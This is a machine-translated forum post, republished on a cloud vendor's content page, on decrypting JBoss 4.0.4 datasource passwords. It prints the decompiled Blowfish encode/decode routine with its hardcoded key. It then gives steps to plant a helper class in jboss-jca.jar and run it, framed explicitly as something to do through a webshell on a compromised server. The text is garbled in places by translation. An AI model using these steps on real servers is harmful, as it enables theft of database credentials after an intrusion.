Summary of issues about JBOSS decryption database connection pool

Source: Internet
Author: User
Tags jboss

I used JDgui and read the decryption methods of the predecessors. I have never succeeded.
In jboss, data source passwords can be encrypted. There are many related articles. Here I will talk about how to crack them.

Jboss-4.0.4.GA as an example, the principle of decryption is very simple, first find the method used for encryption:
Java-cp "xxx. jar ...... "Org. jboss2.resource. security. SecureIdentityLoginModule 13456 Encryption Method


Okay, find the package jboss-jca.jar where SecureIdentityLoginModule is located, and find SecureIdentityLoginModule. class, a slight decompilation is completely clear. encryption uses: private static String encode (String secret), which is naturally decrypted:

private static char[] decode(String secret) private static String encode(String secret)     throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException   {     byte[] kbytes = "jaas is the way".getBytes();     SecretKeySpec key = new SecretKeySpec(kbytes, "Blowfish");     Cipher cipher = Cipher.getInstance("Blowfish");     cipher.init(1, key);     byte[] encoding = cipher.doFinal(secret.getBytes());     BigInteger n = new BigInteger(encoding);     return n.toString(16);   }   private static char[] decode(String secret)     throws NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException   {     byte[] kbytes = "jaas is the way".getBytes();     SecretKeySpec key = new SecretKeySpec(kbytes, "Blowfish");     BigInteger n = new BigInteger(secret, 16);     byte[] encoding = n.toByteArray();     Cipher cipher = Cipher.getInstance("Blowfish");     cipher.init(2, key);     byte[] decode = cipher.doFinal(encoding);     return new String(decode).toCharArray();   }   public static void main(String[] args)     throws Exception   {     String encode = encode(args[0]);     System.out.println("Encoded password: " + encode);   } } 

Okay, encryption and decryption parameters. The most important thing is how to execute the code in webshell. I read the decryption code of Daniel's door. I tested it online. It's not successful. I don't know if it's a castrated version.

Byte [] kbytes = "jaas is the way". getBytes ()The key point is that the previous Daniel came out in July.

Now I am talking about my 2B stupid method. You can try it. The code on the first page of DU Niang is all biased. I sorted it out.

Create a file
Jboss-4.0.4.GA \ server \ default \ lib \ A. java, content:
Package org. jboss. resource. security; what I cannot understand is the meaning of function A. Directly paste the code and class A {public static void main (String args []) throws Exception {SecureIdentityLoginModule seq = new SecureIdentityLoginModule (); char [] decode = seq. decode (args [0]); System. out. println ("Haha, DEcoded password:" + new String (decode ));}}


Create a file
Create another file
SecureIdentityLoginModule.java:package org.jboss.resource.security; SecureIdentityLoginModule.java: package org.jboss.resource.security; class SecureIdentityLoginModule{     static String encode(String s){         return s;         }          static char[] decode(String s){         return new char[100];         } } 

This SecureIdentityLoginModule can be compiled separately, and then put the compiled SecureIdentityLoginModule. class into \ jboss-4.0.4.GA \ server \ default \ lib \ org \ jboss \ resource \ security

Last step, add the compiled A. class to the jboss-jca.jar package (back up before doing something bad ).


Call method:
Java-cp "D: \ jboss-4.0.4.GA \ lib \ jboss-jmx.jar; D: \ jboss-4.0.4.GA \ lib \ jboss-common.jar; D: \ jboss-4.0.4.GA \ server \ default \ lib \ jboss-jca.jar; D: \ jboss-4.0.4.GA \ server \ default \ lib \ jbosssx. jar; D: \ jboss-4.0.4.GA \ server \ default \ lib \ jboss-jca.jar "org. jboss. resource. security. A encrypted string linux is directly to D into/home/jboss-4.0.4.GA \ lib \ jboss-jmx.jar; wait, I will package these four files to the local directory directly. Assume that the java environment can be used. It's all common.
I didn't use the directly compiled file to leave this post. I can also help you with it if you need it.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.